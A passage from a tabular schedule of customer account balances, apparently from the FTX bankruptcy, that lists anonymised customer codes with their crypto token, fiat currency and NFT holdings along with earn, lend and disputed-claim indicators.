| 07395274 | | BRZ[1], BTC[.00228228], CUSDT[3], USD[0.00] | Yes | |
| 07395284 | | LTC[.00028], USD[1.92], USDT[.00452] | | |
| 07395286 | | CUSDT[1], SUSHI[31.20731954], TRX[3], USD[0.00] | | |
| 07395290 | | CUSDT[7], DOGE[2726.59286727], USD[0.00] | Yes | |
| 07395291 | | BTC[0], DAI[0], SOL[0], TRX[0], UNI[0], USD[0.01], USDT[0] | | |
| 07395292 | | DOGE[0], ETH[0], ETHW[0], SOL[0], USD[0.01], USDT[0] | | |
| 07395297 | | CUSDT[1], DOGE[1], USD[0.00], USDT[0] | | |
| 07395299 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07395300 | Contingent, Disputed | MATIC[0], USD[0.00] | Yes | |
| 07395304 | | ALGO[54.26982142], CUSDT[513.33891179], DOGE[.00008386], ETH[.00000015], ETHW[.00000015], SHIB[1], TRX[1.01018628], USD[0.01], USDT[0.00417321] | Yes | |
| 07395310 | | SOL[0], SUSHI[0], USDT[0] | | |
| 07395312 | | BAT[0], DOGE[0], TRX[0], USD[0.37] | | |
| 07395315 | | BAT[0], DOGE[2], USD[0.06] | Yes | |
| 07395316 | | AVAX[0], DOGE[0], GRT[0], LTC[0], SHIB[0], TRX[0], USD[0.00], USDT[0], YFI[0] | | |
| 07395320 | | DOGE[145.07675503], USD[10.00] | | |
| 07395332 | | NFT (568563546803354343/Sigma Shark #4543)[1] | | |
| 07395334 | | SOL[1] | | |
| 07395335 | | DOGE[2], USD[0.00] | | |
| 07395336 | | BRZ[3], CAD[0.00], CUSDT[6], GRT[1.00167263], TRX[3], USD[0.56], USDT[0] | Yes | |
| 07395340 | | TRX[1], USD[0.01], USDT[0] | | |
| 07395343 | | BF_POINT[300], DOGE[.00442658], NFT (320947694683752978/Sand Daisy Redux 1)[1], NFT (321243752550616336/0-60)[1], NFT (428338560605178300/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #69)[1], NFT (454848352722840902/The Miracle Pixel)[1], NFT (541398859498824346/Mad Lions Series #52)[1], USD[0.00], USDT[0.00000985] | Yes | |
| 07395345 | | TRX[.8013072], USD[4.85] | | |
| 07395353 | | BRZ[1], CUSDT[3], DOGE[102.52690638], ETH[.00474199], ETHW[.00468723], KSHIB[2626.07723876], USD[0.00] | Yes | |
| 07395357 | | BTC[0], DOGE[0], LTC[0], SOL[0], USD[0.00] | | |
| 07395361 | | AVAX[1.2987], BCH[0], BTC[0.00034862], DOGE[0], ETH[0], LINK[357.3423], LTC[0], SOL[42.60576000], TRX[0], USD[251.87], USDT[0] | | |
| 07395363 | | BRZ[2], CUSDT[22], DOGE[2], ETH[0], LINK[0], LTC[0], TRX[1], USD[0.31], USDT[0.00000001] | | |
| 07395364 | | CUSDT[3], DOGE[4.04529544], USD[0.00] | Yes | |
| 07395365 | | LTC[3.73943828], USD[561.57] | | |
| 07395374 | | CUSDT[1], TRX[1], USD[0.15] | | |
| 07395375 | | BAT[1], DAI[4862.89359317], USD[100.00] | | |
| 07395391 | | TRX[1], USD[0.01] | Yes | |
| 07395393 | | USD[0.01] | | |
| 07395394 | | BTC[0.00006740], LINK[0.06652858], SOL[0], USD[5.56] | | |
| 07395396 | | BCH[.03639295], CUSDT[2344.29806036], DOGE[4], TRX[341.97471861], USD[1.78], USDT[0] | | |
| 07395401 | | BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[0.21732696], ETH[0], GRT[0], LTC[0.00318928], PAXG[0], SOL[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07395405 | | BRZ[1], CUSDT[10], DOGE[10.46141242], ETH[0], ETHW[0], GBP[0.00], GRT[0], KSHIB[0], SOL[0.39477808], TRX[8], USD[0.00], USDT[0.00001890], YFI[0] | Yes | |
| 07395417 | | BTC[0] | | |
| 07395422 | | BTC[0], DOGE[0], ETH[0], LINK[0], SOL[0], SUSHI[0], UNI[0], YFI[0] | | |
| 07395427 | | BTC[0.00009535], EUR[0.25], USD[387.82], USDT[0.00000001], WBTC[.00000001] | | |
| 07395434 | | DOGE[1], ETH[0], ETHW[0] | | |
| 07395435 | | DOGE[0], ETH[0.00000166], ETHW[0.00000167], SHIB[5], TRX[2], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07395439 | | BAT[1.01139925], DOGE[1], SOL[309.1549784], SUSHI[180.07906053], USD[0.00] | Yes | |
| 07395440 | | BRZ[3], CUSDT[1], DOGE[2], ETH[2.37889688], ETHW[2.37889688], GRT[1], SOL[45.35584032], SUSHI[1], TRX[4], USD[0.00] | | |
| 07395446 | | BTC[.00425689], DOGE[1], USD[0.00] | | |
| 07395447 | | BRZ[1], CUSDT[8], DOGE[1008.49893617], LTC[1.99568395], TRX[1], USD[0.00] | | |
| 07395450 | | DOGE[1622.0078], SOL[0.00280582], UNI[.045007], USD[0.08], USDT[4.2563718] | | |
| 07395454 | | BRZ[1], BTC[.00004696], CUSDT[8], DOGE[103.12310616], TRX[4], USD[33.39] | Yes | |
| 07395456 | | DOGE[0], TRX[2], USD[0.00] | | |
| 07395465 | | DOGE[1736.35768928], TRX[1851.04936344], USD[0.00] | | |
| 07395468 | | BRZ[2], BTC[.01816981], CUSDT[5], DOGE[6.03452542], ETHW[8.95966501], SHIB[21], SOL[.00000001], USD[0.00] | Yes | |
| 07395469 | | DOGE[0], GRT[0], SOL[14.49017397], UNI[38.68885095], USD[0.00] | Yes | |
| 07395479 | | DOGE[3319.04335023], USD[0.00] | Yes | |
| 07395481 | | CUSDT[2], DOGE[7591.49328486], SHIB[2007039.92361617], TRX[1], USD[0.00] | Yes | |
| 07395484 | | BAT[1], BTC[.00684051], DOGE[2], ETH[.07780304], ETHW[.07780304], USD[0.00] | | |
| 07395494 | | BTC[.1115744], SOL[.00894], USD[0.01] | | |
| 07395496 | | CUSDT[2], DOGE[181.75089728], USD[0.27] | | |
| 07395499 | | BRZ[9], BTC[0], CUSDT[49], DOGE[6], ETH[0.00340000], ETHW[0.00340000], TRX[1], USD[0.00], USDT[0.00002115] | | |
| 07395500 | | BRZ[2], CUSDT[10], DOGE[3.00001868], ETH[.00000032], ETHW[0.01403404], SHIB[143.5186363], TRX[5], UNI[0], USD[0.00], USDT[0.00053426] | Yes | |
| 07395502 | | BRZ[1], CUSDT[7], SHIB[4], TRX[3], USD[0.00] | Yes | |
| 07395503 | | LTC[0], SOL[.00000001], USD[0.00], USDT[0] | | |
| 07395505 | | CUSDT[0], DOGE[0], USD[0.00] | | |
| 07395507 | | BRZ[1], BTC[.00161848], ETH[.00966014], ETHW[.00966014], USD[139.39] | | |
| 07395509 | | BTC[.00061312], CUSDT[1], DOGE[1], SOL[1.73274122], TRX[2], UNI[.73472235], USD[0.00] | | |
| 07395513 | | DOGE[1], USD[0.00] | | |
| 07395515 | | BTC[0], DOGE[0], ETH[0], ETHW[0], LTC[0], SHIB[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07395520 | | BTC[0], USD[0.00] | | |
| 07395521 | | ETH[1.00494806], ETHW[1.00494806], MATIC[599.4], SOL[130.88459675], USD[4059.23] | | |
| 07395526 | | BF_POINT[100], DOGE[10], GRT[2], SHIB[38], TRX[1.029], USD[0.00], USDT[2.38990634] | | |
| 07395529 | | USD[10.00] | | |
| 07395532 | | CUSDT[4], DOGE[500.00001623], ETH[.08585], ETHW[.08585], LTC[.42738794], TRX[2099.28178392], USD[0.00] | | |
| 07395539 | | BTC[.00541738], CUSDT[2], DOGE[3.000548], USD[0.00] | Yes | |
| 07395541 | | BRZ[1], CUSDT[1], GRT[1.00404471], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07395543 | | AVAX[0], LINK[0], NFT (496381391480760407/Entrance Voucher #3523)[1], SOL[0], USD[0.00] | | |
| 07395545 | | DOGE[166.97572669], USD[0.00], USDT[0] | | |
| 07395550 | | CUSDT[1], DOGE[1], TRX[.72486601], USD[0.56] | | |
| 07395551 | | CUSDT[1], USD[0.00] | Yes | |
| 07395553 | | BCH[0], CUSDT[20], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], TRX[1], USD[0.00], USDT[0] | | |
| 07395558 | | BTC[.03172475], DOGE[1047.47675035], ETH[.06141193], ETHW[.06064812], SHIB[31330033.99874212], SOL[1.07946424], SUSHI[17.99160538], USD[0.00] | Yes | |
| 07395560 | | BTC[0.00001362], SUSHI[0], USD[0.00], USDT[0] | | |
| 07395563 | | BTC[0], ETH[0.00000001], ETHW[0], USD[0.00], USDT[0.00000025] | | |
| 07395566 | | BRZ[2], CUSDT[1], TRX[1], USD[0.00], USDT[1] | | |
| 07395567 | | USDT[0] | | |
| 07395568 | | SOL[.0932553], USD[0.00] | | |
| 07395572 | | ETH[0], SOL[0], SUSHI[.00000001], USD[0.00], USDT[0] | | |
| 07395574 | | BRZ[2], BTC[0], CUSDT[4], TRX[0], USD[0.00], USDT[0] | | |
| 07395580 | | BTC[.03], ETH[3.63406602], ETHW[3.63406602], NEAR[90.813645], SOL[1.9981], USD[588.56], USDT[0] | | |
| 07395582 | | BRZ[5], CUSDT[35], GRT[1], SOL[1.10219964], TRX[6], USD[0.00] | | |
| 07395583 | | NFT (385893976411442921/Humpty Dumpty #1438)[1] | | |
| 07395585 | | DOGE[0], USD[0.00] | | |
| 07395586 | | DOGE[.763], LINK[.0852], USD[0.76] | | |
| 07395587 | | BTC[.00254576], CUSDT[1], DOGE[14.91348463], ETH[.00164279], ETHW[.00164279], TRX[55.98549464], USD[4.75], USDT[3.23311634] | | |
| 07395588 | | GRT[4.63381221], USD[0.89], USDT[0.00000001] | | |
| 07395592 | | KSHIB[23.83035136], USD[0.00] | Yes | |
| 07395594 | | BTC[0.00044006], DOGE[2], USD[0.00] | | |
| 07395597 | | BCH[1.09460486], BRZ[1], DOGE[5704.32431332], LINK[1.0020364], LTC[.99269205], TRX[206.40197473], USD[0.00], USDT[1] | | |
| 07395599 | | BTC[.00105476], CUSDT[1], DOGE[148.78767758], ETH[.01636114], ETHW[.01636114], TRX[167.16135283], USD[0.00] | | |
| 07395605 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07395607 | | DOGE[1], SOL[13.85514574] | | |
| 07395615 | | CUSDT[3], DOGE[231.44101611], SOL[3.59196237], SUSHI[2.26440469], TRX[103.14875812], USD[0.07] | Yes | |
| 07395621 | | AAVE[0], BAT[.01112063], BCH[0], BTC[0], CUSDT[12], DOGE[0], ETH[0.00000581], ETHW[0.00000581], GRT[0], LINK[0], LTC[0], SHIB[1], SOL[0], SUSHI[0], TRX[1], UNI[0], USD[34.12], USDT[0], YFI[0] | Yes | |
| 07395624 | | CUSDT[15], SHIB[5], USD[0.00] | Yes | |
| 07395625 | | BAT[0], TRX[0], USD[0.00], USDT[0] | | |
| 07395629 | | CUSDT[6], TRX[4], USD[0.01] | | |
| 07395632 | | BTC[0], ETH[0], ETHW[0], PAXG[0], USD[0.00] | | |
| 07395636 | | DOGE[2], USD[0.01] | | |
| 07395637 | | USD[0.03] | | |
| 07395638 | | BTC[0], DAI[0], ETH[0.00000001], ETHW[0], SOL[0], TRX[.00005], USDT[0] | | |
| 07395639 | | BAT[1.0165555], CUSDT[3], LTC[0], TRX[3], USD[0.00], USDT[1.10257961] | Yes | |
| 07395641 | | CUSDT[3], KSHIB[.19838642], SHIB[.00000526], TRX[1], USD[0.00] | Yes | |
| 07395647 | | AAVE[.00012469], BTC[0], DAI[0], DOGE[0], ETH[0], ETHW[0], LINK[.00024253], SHIB[9], SUSHI[.00720831], UNI[.00046854], USD[4967.62], USDT[0.00000913] | Yes | |
| 07395650 | | BRZ[1], BTC[.00046639], CUSDT[521.9428613], DOGE[313.81277912], ETH[.00944161], ETHW[.00931849], LTC[.06825047], TRX[1], USD[0.00] | Yes | |
| 07395651 | | GRT[0.00458289], NFT (297258164580304646/Saudi Arabia Ticket Stub #1582)[1], SHIB[3], SOL[0], TRX[507.12032553], USD[0.00] | Yes | |
| 07395655 | | BRZ[2], CUSDT[6], USD[0.00] | | |
| 07395664 | | DOGE[1], MATIC[.00119391], SHIB[2], TRX[2], USD[677.23] | Yes | |
| 07395670 | | USD[0.00] | | |
| 07395672 | | BAT[1.0160319], DOGE[.28312529], USD[0.09] | Yes | |
| 07395686 | | DOGE[.189], XRP[4171.2305] | | |
| 07395687 | | BRZ[1], CUSDT[1], DOGE[3231.31588089], USD[0.00], USDT[1.10509971] | Yes | |
| 07395690 | | BRZ[1], DOGE[3], SHIB[1], TRX[2], USD[0.00] | Yes | |
| 07395699 | | BAT[417.0765546], BCH[.29933446], BRZ[3], CUSDT[23], DOGE[6.08495669], ETHW[2.12884313], GRT[1.0026813], LINK[42.54456834], LTC[6.24218321], SHIB[40000000], SOL[45.71119598], SUSHI[12.93622479], TRX[448.44473157], UNI[11.56440452], USD[2740.86], USDT[0.08345015] | | |
| 07395702 | | USD[0.00] | | |
| 07395703 | | BCH[.0518] | | |
| 07395705 | | BTC[.49658968], ETH[2.5], ETHW[2.5], USD[775.02] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07395709 | | BAT[0], DOGE[2.91530177], ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07395713 | | BTC[0.00008605], CUSDT[267.11606307], DOGE[850.81378799], ETH[0.00237249], ETHW[0.00238047], TRX[39.72170169], USD[0.00] | Yes | |
| 07395719 | | BF_POINT[500], BTC[0.00297059], GRT[206.32955568], LINK[7.10295539], LTC[1.7618884], MATIC[46.60493004], NEAR[9.18070178], SOL[0.74823815], TRX[1], USD[103.76], USDT[0.00000001] | Yes | |
| 07395724 | | BAT[2.08748018], BRZ[5.05308843], BTC[.08442684], CUSDT[14], DOGE[0], ETH[.79606956], ETHW[23.79500378], GRT[2.05567972], LTC[.00001], TRX[13.3434095], USD[0.00], USDT[4.30039301] | Yes | |
| 07395726 | | BAT[1.01562751], BRZ[1], BTC[.0000001], CUSDT[5], DOGE[1289.46687028], SHIB[16057781.76494119], TRX[5], USD[1.64], USDT[1.02543197] | Yes | |
| 07395730 | | USD[0.08], USDT[0] | | |
| 07395733 | | AAVE[.4890922], BTC[0.00746381], DOGE[9.99], ETH[.014985], ETHW[.014985], GRT[395.604], LTC[1], SOL[.0074], USD[0.02], USDT[0] | | |
| 07395736 | | DOGE[300.04973178], ETH[.18571515], ETHW[.18571515], TRX[718.25170776], USD[0.00] | | |
| 07395737 | | USD[2.50] | | |
| 07395739 | | BRZ[1], CUSDT[1], GRT[.82082461], TRX[5], USD[0.00] | Yes | |
| 07395742 | | NFT [5176813434096585571/Entrance Voucher #2357][1] | Yes | |
| 07395748 | Contingent, Disputed | DAI[0], ETH[0], ETHW[0], USDT[0.00001524], WBTC[0] | | |
| 07395755 | | BTC[.01364408], ETH[.05433206], MATIC[54.14259838], SHIB[1.00000018], USD[367.89] | | |
| 07395765 | | USD[3.17] | | |
| 07395770 | | BAT[1.01655549], BRZ[3], CUSDT[26], DOGE[16.44917294], ETHW[.01107626], SHIB[4], TRX[16.00024984], USD[139.07] | Yes | |
| 07395773 | | AVAX[.0556], BTC[.00002221], DOGE[.9714], ETHW[.00048202], LINK[.02362], USD[107.03], USDT[0] | | |
| 07395780 | | BRZ[1], CUSDT[4], DOGE[21077.55824954], GRT[1], TRX[2], USD[0.00] | | |
| 07395781 | | BTC[0], CUSDT[1], KSHIB[197.9906223], NFT [4158211499616635560/Into the unknown)[1], NFT [57438271351005855/Abstract)[1], TRX[21.69673361], USD[4.07], USDT[0] | Yes | |
| 07395782 | | BTC[0], CUSDT[1], SOL[0], UNI[0], USD[0.00] | | |
| 07395784 | | BTC[0], DAI[.00000001], ETH[0] | | |
| 07395796 | | BTC[0.10508394], DOGE[284.15355], KSHIB[1508.5655], SOL[140.634982], USD[2.59] | | |
| 07395799 | | CUSDT[1], USD[0.01] | Yes | |
| 07395806 | | BAT[1], BRZ[1], DOGE[1], SHIB[3715472.85339733], USD[0.00], USDT[1.04728452] | Yes | |
| 07395813 | | BTC[.01434528], ETH[.1713464], ETHW[.1713464], USD[0.63] | | |
| 07395815 | | CUSDT[1], TRX[179.4652878], USD[0.00] | | |
| 07395820 | | USD[0.01], USDT[1] | | |
| 07395825 | | BAT[0], BRZ[0], BTC[0], DOGE[0], ETH[0], SHIB[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], YFI[0] | Yes | |
| 07395826 | | BRZ[1], SUSHI[1], TRX[2], UNI[1], USD[0.00], USDT[1] | | |
| 07395832 | | BRZ[1], BTC[.00087248], CUSDT[2], DOGE[26], GRT[258.36071528], LTC[.09906927], TRX[4], USD[2406.96], USDT[0] | | |
| 07395838 | | DOGE[2], USD[121.45] | | |
| 07395840 | | SOL[.00589], USD[0.00] | | |
| 07395846 | | DOGE[1], TRX[1], USD[0.00], USDT[0] | | |
| 07395854 | | BAT[5.13238192], BCH[.04947499], BTC[.00012438], CUSDT[2], DAI[19.86829051], DOGE[32.98142917], ETH[.0001559], ETHW[.0001559], GRT[10.42846973], SUSHI[.72582552], TRX[663.5800599], USD[0.00], YFI[.00061949] | | |
| 07395857 | | USDT[0] | | |
| 07395859 | | DOGE[1.11214633], USD[0.00] | | |
| 07395874 | | CUSDT[7], DOGE[1], MATIC[0], SOL[.70891325], TRX[1], USD[0.00], USDT[0] | | |
| 07395877 | | CUSDT[2], DOGE[7.19689337], TRX[5], USD[0.00] | Yes | |
| 07395879 | | BAT[0], DOGE[0.07955809], ETH[0], SHIB[1], USD[0.00] | Yes | |
| 07395889 | | USD[0.00] | | |
| 07395895 | | BCH[0], BTC[0.00005130], ETH[0], LTC[0], MATIC[0], SOL[0], USD[0.39], USDT[0], YFI[0] | | |
| 07395899 | | BTC[.00005829] | | |
| 07395905 | | BAT[15.88741132], BRZ[0], BTC[0], CUSDT[182.34441111], DOGE[0], ETH[0], EUR[0.00], LINK[1.12572819], LTC[0], SOL[2.42767898], SUSHI[0], TRX[112.53843201], USD[0.00] | | |
| 07395906 | Contingent, Disputed | AUD[1.61], BAT[0], BCH[0.01870808], BRZ[0], BTC[0.00038258], CUSDT[305.03266410], DOGE[36.54862777], ETH[0.00458447], ETHW[0.00458447], PAXG[0], SUSHI[0], TRX[1], USD[13.36], USDT[0], YFI[0] | | |
| 07395909 | | CUSDT[1], USD[5.70] | Yes | |
| 07395910 | | BRZ[4], CUSDT[2], DOGE[601.86721375], SHIB[7], TRX[1], USD[0.00], USDT[0] | | |
| 07395916 | | BAT[0], BTC[0], CUSDT[11], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07395917 | | BAT[0], BCH[0], BTC[0], DOGE[3], ETH[0], TRX[5], USD[117.77] | | |
| 07395919 | | USD[0.01] | | |
| 07395920 | | DOGE[0], USD[8.44] | | |
| 07395936 | | USD[0.51] | | |
| 07395938 | | BRZ[1], BTC[0.00327864], CUSDT[6], DOGE[0], ETH[0], ETHW[0], SOL[0], TRX[1], USD[0.00] | | |
| 07395939 | | TRX[41.22106507], USD[0.00] | Yes | |
| 07395940 | | USD[0.51] | Yes | |
| 07395943 | | USD[119.45] | | |
| 07395945 | | DOGE[1], TRX[853.36726776], USD[50.00] | | |
| 07395947 | | USD[100.00] | | |
| 07395949 | | BAT[2], BRZ[4], CUSDT[6], GRT[1], TRX[6], USD[1.02] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07395950 | | BRZ[2], CUSDT[4], DOGE[2.50869269], NFT (492322959726361887/Entrance Voucher #2006)[1], SHIB[28863270.17278926], TRX[962.06313116], USD[0.21] | Yes | |
| 07395955 | | BRZ[1], CUSDT[5], DOGE[21401.11802407], ETH[2.03259394], ETHW[2.03259394], GRT[2], SHIB[14910054.1164687], TRX[.00004585], USD[1.28], USDT[1] | | |
| 07395959 | | BRZ[1], USD[0.00] | | |
| 07395961 | | DOGE[3], USD[0.00], USDT[0.00002849] | | |
| 07395962 | | BTC[0], CUSDT[1], DOGE[1], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], TRX[0], USD[0.00] | | |
| 07395967 | | BTC[0], LINK[.032], SOL[.00352], SUSHI[.1505], USDT[9.2491697] | | |
| 07395969 | | BAT[1.0165555], BRZ[12.12372413], CUSDT[67.23156075], DOGE[.05869602], TRX[24.22721357], USD[0.00], USDT[3.30647022] | Yes | |
| 07395972 | | USD[20.00] | | |
| 07395973 | | CUSDT[2], DOGE[3], SHIB[1], SOL[20.16827858], TRX[3058.80257205], USD[0.00] | | |
| 07395974 | | BRZ[3], CUSDT[82], DOGE[331.66440608], ETH[.00744027], ETHW[.00744027], TRX[6], USD[0.00] | | |
| 07395975 | | DOGE[.00000783], USD[0.12] | | |
| 07395976 | | BAT[1], ETH[0], LTC[.00276676], USD[0.00], USDT[0.00000010] | Yes | |
| 07395978 | | BAT[1], BF_POINT[300], BRZ[2], CUSDT[8], DOGE[4.00306966], SHIB[1], TRX[4], USD[5.97], USDT[0.00000617] | Yes | |
| 07395988 | | CUSDT[3], DOGE[2], USD[0.00] | Yes | |
| 07395989 | | USD[18.42] | | |
| 07395994 | | SOL[0], USD[0.42] | | |
| 07395996 | | CUSDT[1], DOGE[1690.25977914] | | |
| 07396006 | | DOGE[1], USD[0.47] | | |
| 07396030 | | AVAX[0], ETH[0], ETHW[0], LINK[0], SOL[0], USD[0.00] | | |
| 07396036 | | LINK[8.6008319], TRX[1], USD[37.30] | | |
| 07396043 | | USD[0.00] | | |
| 07396047 | | DOGE[534.901], ETH[.0001036], ETHW[.0001036], SOL[.132], USD[0.96] | | |
| 07396050 | | USD[0.00] | | |
| 07396055 | | DOGE[1], TRX[342.099578], USD[0.00] | | |
| 07396056 | | USD[0.02], USDT[0] | | |
| 07396070 | | CUSDT[1], DOGE[73.24345099], USD[0.80] | | |
| 07396082 | | USD[0.01] | | |
| 07396086 | | BRZ[1], BTC[.00031804], DOGE[4], USD[0.00] | | |
| 07396088 | | SOL[0], USD[0.00] | | |
| 07396091 | | USD[1.17], USDT[0] | Yes | |
| 07396098 | | BAT[154.25936351], BRZ[1], CUSDT[2], DOGE[1463.41830719], TRX[1707.09678714], USD[0.00] | Yes | |
| 07396101 | | AAVE[.00817695], SOL[0.01680405], USD[0.00], USDT[0] | | |
| 07396103 | | CUSDT[5], DOGE[799.19757949], LINK[10.15851235], TRX[4087.08141789], USD[109.01] | Yes | |
| 07396108 | | BF_POINT[100], NFT (308686400444236393/Belgium Ticket Stub #77)[1], NFT (383328989134490962/Bahrain Ticket Stub #995)[1], NFT (386346333869301165/Austria Ticket Stub #60)[1], NFT (391808005457930448/Series 1: Capitals #421)[1], NFT (400276700996086123/The Hill by FTX #541)[1], NFT (409861759786667118/The Reflection of Love #811)[1], NFT (419972426544207162/Humpty Dumpty #1593)[1], NFT (422278470391663259/Series 1: Wizards #382)[1], NFT (423717387910509568/Silverstone Ticket Stub #282)[1], NFT (441731682897419952/Montreal Ticket Stub #14)[1], NFT (447688330154836373/France Ticket Stub #16)[1], NFT (449388872613096983/FTX Crypto Cup 2022 Key #4<br>)[1], NFT (451765072282411308/Medallion of Memorial)[1], NFT (474802424736956691/FTX - Off The Grid Miami #517)[1], NFT (508759751356522918/Entrance Voucher #1452)[1], NFT (518712652268010399/Hungary Ticket Stub #109)[1], NFT (543577927134654736/Microphone #1305)[1], NFT (545762022164393952/Medallion of Memorial)[1], USD[1.57], USDT[0] | Yes | |
| 07396111 | | USD[0.00] | | |
| 07396112 | | BTC[.0002313], USD[0.00] | | |
| 07396115 | | BRZ[5.07952967], CUSDT[5], USD[0.00] | Yes | |
| 07396117 | | BAT[0], BRZ[0], BTC[0], DOGE[2.07247621], ETH[0], GRT[0], LINK[0], SUSHI[0], UNI[0], USD[0.00], USDT[0] | | |
| 07396123 | | BTC[.48381436] | Yes | |
| 07396131 | | CUSDT[1], USD[40.80] | | |
| 07396135 | | BTC[0], DOGE[232.10948613], USD[0.00] | | |
| 07396143 | | DOGE[2.000071], USD[0.42] | | |
| 07396145 | | ETHW[.00132445], LINK[.00014993], MATIC[.00155027], SHIB[7], USD[0.01] | Yes | |
| 07396146 | | DOGE[2], USD[0.01] | | |
| 07396147 | | BTC[.00018297], CUSDT[8], KSHIB[628.88090496], SHIB[1138006.77452491], SOL[.23740321], TRX[200.36366621], USD[0.00] | Yes | |
| 07396148 | | LINK[0], LTC[0] | | |
| 07396151 | | SUSHI[0] | | |
| 07396152 | | BRZ[2], DOGE[4], USD[0.01] | | |
| 07396160 | | AAVE[.00042571], BAT[127.44563554], BTC[.00181471], CUSDT[8], DOGE[1019.46267138], ETH[.05148729], ETHW[.05148729], KSHIB[1410.85591549], LINK[6.16532102], LTC[.28662369], MATIC[62.11302459], MKR[.04900778], SHIB[1555453.8788303], SOL[2.07404503], SUSHI[23.57065258], TRX[1], USD[0.00], YFI[.0028601] | | |
| 07396164 | | NFT (312707637427528833/Imola Ticket Stub #2496)[1], NFT (553228434206575657/FTX - Off The Grid Miami #2053)[1] | Yes | |
| 07396170 | | DOGE[2], USD[0.00] | | |
| 07396184 | | BAT[.2172], BCH[.00019725], BTC[.00005554], DOGE[.2692], ETH[.4561335], ETHW[.4561335], GRT[.9031], LINK[.020355], LTC[.0091735], SOL[.016745], SUSHI[.381725], TRX[.99], UNI[.09069], USD[1.78] | | |
| 07396185 | | CUSDT[4696.36817689], DOGE[786.59589374], TRX[31367.05416817], USD[0.00] | | |
| 07396187 | Contingent, Disputed | AVAX[.03], TRX[.000105], USD[0.00], USDT[.0735537] | | |
| 07396193 | | USD[0.04] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07396194 | | BTC[0], DOGE[0], LINK[0], USD[6.96], USDT[0] | | |
| 07396195 | | BRZ[2], CUSDT[2347.62512872], DOGE[480.83970253], NFT (322772751638703144/Metaverse Rooms #18)[1], NFT (353311155946396979/Metaverse Rooms #23)[1], NFT (376142814511599143/Metaverse Rooms #17)[1], NFT (384798296280389582/Metaverse Rooms #12)[1], NFT (471664467236910490/Metaverse Rooms #14)[1], NFT (531186248322259092/Metaverse Rooms #16)[1], NFT (544332778135106306/Metaverse Rooms #15)[1], NFT (563052335384025817/Metaverse Rooms #25)[1], TRX[2.37405002], USD[0.61] | | |
| 07396203 | | BRZ[1], CUSDT[32003.97713621], TRX[19653.5644704], USD[0.00], USDT[1.10820242] | Yes | |
| 07396219 | | BAT[2], CUSDT[2], DOGE[3], LINK[31.68148552], TRX[7205.36505645], UNI[20.54581051], USD[0.01] | | |
| 07396220 | | BTC[0], USD[0.00], USDT[0] | | Yes |
| 07396227 | | CUSDT[22.05736998], DOGE[0], TRX[0], USD[0.00] | | |
| 07396237 | | MATIC[.4], NFT (313966266580306904/France Ticket Stub #20)[1], NFT (361514087953555388/Montreal Ticket Stub #204)[1], NFT (372284993809716713/Saudi Arabia Ticket Stub #1557)[1], NFT (382700331451477765/Hungary Ticket Stub #89)[1], NFT (394743256949623864/Silverstone Ticket Stub #262)[1], NFT (396325665379296880/Belgium Ticket Stub #160)[1], NFT (407519293528573467/Austria Ticket Stub #48)[1], NFT (437883084695927268/Barcelona Ticket Stub #1102)[1], NFT (481019762428387078/Series 1: Wizards #391)[1], NFT (504199296123963426/Baku Ticket Stub #249)[1], NFT (512248557352429977/Series 1: Capitals #427)[1], USD[0.52] | Yes | |
| 07396239 | | BF_POINT[200], BTC[.11334417], DOGE[27.25294637], LINK[.0198734], LTC[.5281734], SHIB[188336.34417776], SOL[33.55202176], USD[40.52], USDT[0.09406480] | Yes | |
| 07396248 | | BAT[1.01655549], CUSDT[9], DOGE[0], SHIB[947563.17779128], TRX[5], USD[0.00] | Yes | |
| 07396251 | | DOGE[0], USD[0.00] | | |
| 07396254 | | CUSDT[4], TRX[7712.07622801], USD[2036.14] | | |
| 07396258 | | BF_POINT[100], USD[5098.59], USDT[0] | Yes | |
| 07396259 | | CUSDT[3], ETH[0.00240876], ETHW[0.00240876], GRT[1], TRX[1], USD[0.00], USDT[1] | Yes | |
| 07396262 | | BCH[0], BTC[0], CUSDT[1], DOGE[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07396268 | | DOGE[1], USD[0.00] | | |
| 07396271 | | BTC[.00167107], CUSDT[7], DOGE[.000006], SHIB[1], TRX[.00678102], USD[0.01] | Yes | |
| 07396272 | | TRX[1], USD[0.02] | | |
| 07396275 | | BCH[0], CUSDT[5], DOGE[1], ETH[0], LINK[0], SOL[1.16960161], SUSHI[0], TRX[1], UNI[1.09097712], USD[0.01], USDT[0] | Yes | |
| 07396279 | | BTC[0], ETH[0], MATIC[0], USD[0.00], USDT[0] | | |
| 07396280 | | SUSHI[0], USDT[0] | | |
| 07396282 | | BRZ[2], CUSDT[15], DOGE[4.00000006], TRX[4], USD[0.00] | Yes | |
| 07396285 | | DOGE[12.31374271], ETH[.00077672], ETHW[.00077672], SUSHI[.1084726], TRX[27.50906389], USD[11.00] | | |
